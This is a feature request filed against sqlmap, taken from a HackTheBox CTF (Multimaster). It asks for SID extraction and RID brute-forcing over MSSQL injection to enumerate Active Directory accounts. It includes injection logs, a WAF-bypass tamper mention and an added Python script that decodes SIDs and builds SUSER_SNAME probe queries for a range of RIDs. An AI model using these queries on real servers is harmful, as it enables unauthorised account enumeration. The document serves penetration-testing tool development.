
MSSQL RID Bruteforce #4188

Description

@uBadRequest

Is your feature request related to a problem? Please describe.
Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this:

[02:48:21] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): 'ԁ\\u0000\\u0000Ԁ\\u0015\\u0000\\u001c병臑䧱�㛂Ȁ\\u0000'

If I use the hex flag, it looks like this:

[08:40:26] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): '\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00'

I haven't had any luck at trying to decode this to the proper format.
The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online.
I was using the tamper charunicodeencode to bypass the WAF.

Describe the solution you'd like
Implement a method of retrieving the SID from a MSSQL server, and bruteforce users' RIDs to discover the usernames of users in AD.

Describe alternatives you've considered
I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit a lot of the code and still couldn't get it to work.

Additional context
In case you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.
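Editor's added example (not sqlmap code, not mssqli-duet code, and not part of the reporter's issue): the two things the request needs are a decoder for the binary SID that SUSER_SID() returns and an encoder that appends a candidate RID so the server can be asked to resolve it with SUSER_SNAME(). The sample inputs are copied from the output quoted above; sqlmap's hex display is a Python-style string in which bytes that happen to form valid UTF-8 are shown as characters (Ѽ is D1 BC, с is D1 81), printable ASCII as itself and everything else as \xHH escapes, so the first function turns that display back into bytes. The decoder also tolerates the leaked 24-byte value, whose count byte already reads 5 although only four sub-authorities follow. The query builder assumes SUSER_SNAME() is reachable through the injection and that the server can resolve domain SIDs; the account names it returns are not known from the page.

```python
import re
import struct

# Constructed test inputs, copied from the output quoted in the issue.
# sqlmap --hex display of SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'); the two
# non-ASCII characters in the middle are written as \u escapes to avoid any
# copy/paste ambiguity (U+047C 'Ѽ' -> D1 BC, U+0441 'с' -> D1 81).
SQLMAP_HEX_OUTPUT = (
    r"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00"
    + "\u047c\u0441"
    + r"\xf1I+\xdf\xc26\x00\x02\x00\x00"
)
# Domain SID as leaked: 24 bytes, count byte already 5, only four sub-authorities.
LEAKED_DOMAIN_SID_HEX = "0105000000000005150000001C00D1BCD181F1492BDFC236"


def sqlmap_repr_to_bytes(text: str) -> bytes:
    """Recover raw bytes from sqlmap's --hex display of a binary column."""
    out = bytearray()
    i = 0
    while i < len(text):
        if text.startswith("\\x", i) and i + 4 <= len(text):
            out.append(int(text[i + 2:i + 4], 16))   # \xHH escape -> one byte
            i += 4
        else:
            out += text[i].encode("utf-8")            # shown as a character
            i += 1
    return bytes(out)


def decode_sid(blob: bytes) -> str:
    """Binary SID -> 'S-1-5-21-...' text.

    Layout: revision (1 byte), sub-authority count (1 byte), 48-bit big-endian
    identifier authority, then count x 32-bit little-endian sub-authorities.
    The count byte is trusted only as far as bytes are actually present, so a
    leaked domain SID whose count already includes the RID still decodes.
    """
    if len(blob) < 8:
        raise ValueError("SID blob shorter than 8 bytes")
    revision, count = blob[0], blob[1]
    authority = int.from_bytes(blob[2:8], "big")
    n = min(count, (len(blob) - 8) // 4)
    subs = struct.unpack("<%dI" % n, blob[8:8 + 4 * n])
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def encode_sid(text: str) -> bytes:
    """'S-1-5-21-...' text -> binary SID (inverse of decode_sid)."""
    m = re.fullmatch(r"S-(\d+)-(\d+)((?:-\d+)*)", text)
    if not m:
        raise ValueError("not a SID: %r" % text)
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(s) for s in m.group(3).split("-") if s]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def split_rid(sid_text: str):
    """Split 'S-1-5-21-a-b-c-RID' into ('S-1-5-21-a-b-c', RID)."""
    domain, _, rid = sid_text.rpartition("-")
    return domain, int(rid)


def suser_sname_probe(domain_sid: str, rid: int) -> str:
    """SQL asking the server to resolve domain_sid + rid to an account name.

    SUSER_SNAME() accepts a binary SID, so a RID cycle is one SELECT per
    candidate RID. The 0x literal needs no quotes, which helps when a WAF is
    filtering them (assumption: the injection point allows a SELECT).
    """
    blob = encode_sid("%s-%d" % (domain_sid, rid))
    return "SELECT SUSER_SNAME(0x%s)" % blob.hex().upper()


def rid_cycle_queries(domain_sid: str, rids) -> list:
    """One probe query per candidate RID, e.g. range(500, 1200)."""
    return [suser_sname_probe(domain_sid, r) for r in rids]


if __name__ == "__main__":
    full = decode_sid(sqlmap_repr_to_bytes(SQLMAP_HEX_OUTPUT))
    print("SUSER_SID output decodes to", full)
    domain, rid = split_rid(full)
    print("domain SID", domain, "trailing RID", rid)
    print("leaked hex decodes to", decode_sid(bytes.fromhex(LEAKED_DOMAIN_SID_HEX)))
    for q in rid_cycle_queries(domain, range(500, 503)):
        print(q)
```

Run as-is, the hex display from the issue decodes to S-1-5-21-3167813660-1240564177-918740779-512: the leaked value is the same SID without the trailing sub-authority, and 512 is the RID of the group that was queried. The decoded bytes were already complete in the reporter's --hex output; only the mixed character/escape rendering hid them.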
